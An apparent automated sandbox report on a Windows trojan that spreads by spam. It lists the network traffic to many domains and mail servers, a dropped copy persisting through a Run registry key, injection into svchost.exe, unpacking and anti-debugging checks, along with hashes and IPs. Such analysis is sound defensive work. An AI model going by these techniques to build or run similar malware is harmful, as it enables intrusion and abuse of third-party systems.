hHNyxH1C7AheUWc3NCEhUbb7hNmr442mAWPeumlLYQzvIGEtrtOTP5mSwf83/M5Xsnl17gnvHKzlTgSxjm8IpKKlrHeyrTXql6RDYwatu7r6tUnuETO7SNV2/zeLQ5dkctyptOb9WHpDzrxonNys3y0NNOGS5q/9I9WMb9nEj0cqlGMTpAKoncZ7pBSt7QNjV0q9CTichNMtpKA19qVb6ChdO44afwe5A2191qdmWZla5bdZ9kppjF2ujrY7+NDKicAlJ7tErQQ2/nzkl+2Y0rbUZcb8ChJUHah9L2jDhvGLf0YRuYVOos2saSdDazDhWdfsya2IR2N+93o9OJSWqhFplFHCG3sWwbbMM7Y9nWl1rdGYHykeC1IoiZiIb1W0OGunDYxRh2gjeLmeG/5rnbA3e1ng4jyI3ysIppccOSbTYG4EhsO8OdaZ/IXSpXW31BMmuNoAk/lz5+XvSZgktKHGkI6jfX5PO15cGzIbHozGH+4XdN9mfK7IDmJh+0c5YK8kXUBPTO4sQD7lU40zaVdpypQhuOLJQRBPzTw3y7kzHK7dJ17kMPj0o1sS
                  Source: unknownDNS traffic detected: queries for: www.ftchat.com
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001040 recv,GetTickCount,6_2_04001040
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:50309 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:50321 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.4:50331 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:50302 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.4:55471 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.4:55464 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:55462 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:56189 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:56192 version: TLS 1.2

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 19
                  Source: PIyT9A3jfC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01181F801_2_01181F80
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01183E701_2_01183E70
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011985701_2_01198570
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011889DE1_2_011889DE
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011955C01_2_011955C0
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118CDF61_2_0118CDF6
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011828001_2_01182800
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011810001_2_01181000
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011834501_2_01183450
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011988501_2_01198850
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011974401_2_01197440
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011814C01_2_011814C0
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011967101_2_01196710
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011883401_2_01188340
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011842501_2_01184250
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011836901_2_01183690
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01197E801_2_01197E80
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB3E703_2_00FB3E70
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB1F803_2_00FB1F80
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB14C03_2_00FB14C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB34503_2_00FB3450
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC88503_2_00FC8850
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC74403_2_00FC7440
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB28003_2_00FB2800
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB10003_2_00FB1000
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBCDF63_2_00FBCDF6
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB89DE3_2_00FB89DE
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC55C03_2_00FC55C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC85703_2_00FC8570
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB36903_2_00FB3690
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC7E803_2_00FC7E80
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB42503_2_00FB4250
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB83403_2_00FB8340
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC67103_2_00FC6710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408A6BA6_2_0408A6BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04007F796_2_04007F79
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040077996_2_04007799
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0400B9356_2_0400B935
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040072C46_2_040072C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04007B6D6_2_04007B6D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040083996_2_04008399
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\pigalicapi.exe DB47DF7CF51747E533C968DA7452F1CE6D20F465D7FCD6E2EAC559266AC3E9ED
                  Source: PIyT9A3jfC.exeReversingLabs: Detection: 26%
                  Source: PIyT9A3jfC.exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile read: C:\Users\user\Desktop\PIyT9A3jfC.exeJump to behavior
                  Source: PIyT9A3jfC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PIyT9A3jfC.exe C:\Users\user\Desktop\PIyT9A3jfC.exe
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                  Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@19/4@967/100
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: PIyT9A3jfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: PIyT9A3jfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: PIyT9A3jfC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: PIyT9A3jfC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: PIyT9A3jfC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: PIyT9A3jfC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: PIyT9A3jfC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeUnpacked PE file: 1.2.PIyT9A3jfC.exe.1330000.1.unpack
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118DF86 push ecx; ret 1_2_0118DF99
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBDF86 push ecx; ret 3_2_00FBDF99
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04009D2D push ecx; ret 6_2_04009D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04000E0A push ebp; ret 6_2_04000E0B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B08C push es; iretd 6_2_0408B09A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B0CB push 7240BFEDh; ret 6_2_0408B0D2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408A9BB push E44F2B70h; ret 6_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408AA04 push E44F2B70h; ret 6_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B378 push eax; ret 6_2_0408B389
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B3D9 pushfd ; ret 6_2_0408B3E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,6_2_0408BF20

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.PIyT9A3jfC.exe.1330000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.f20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.PIyT9A3jfC.exe.1330000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.f20000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.6a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.815888056.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.817368079.0000000001330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.815888334.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exe TID: 6452Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exe TID: 4572Thread sleep time: -35000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exe TID: 7020Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Users\user\pigalicapi.exe TID: 6540Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Users\user\pigalicapi.exe TID: 6760Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4352Thread sleep count: 209 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6660Thread sleep count: 200 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 1788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5320Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5540Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeAPI coverage: 9.8 %
                  Source: C:\Users\user\pigalicapi.exeAPI coverage: 9.8 %
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01191989 FindFirstFileExW,1_2_01191989
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01195EA0 FindFirstFileA,1_2_01195EA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC1989 FindFirstFileExW,3_2_00FC1989
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC5EA0 FindFirstFileA,3_2_00FC5EA0
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeAPI call chain: ExitProcess graph end nodegraph_1-8776
                  Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_3-8752
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17606
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17738
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17612
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118DD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0118DD8F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,6_2_0408BF20
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118C777 GetProcessHeap,1_2_0118C777
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118C1C9 mov eax, dword ptr fs:[00000030h]1_2_0118C1C9
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBC1C9 mov eax, dword ptr fs:[00000030h]3_2_00FBC1C9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00401005 mov eax, dword ptr fs:[00000030h]6_2_00401005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001A30 mov eax, dword ptr fs:[00000030h]6_2_04001A30
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118DEDD SetUnhandledExceptionFilter,1_2_0118DEDD
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118DD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0118DD8F
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_011895A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011895A0
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118DF9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0118DF9B
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBDEDD SetUnhandledExceptionFilter,3_2_00FBDEDD
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FB95A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00FB95A0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBDD8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00FBDD8F
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FBDF9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00FBDF9B

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.205.70.128 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.211.41.39 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
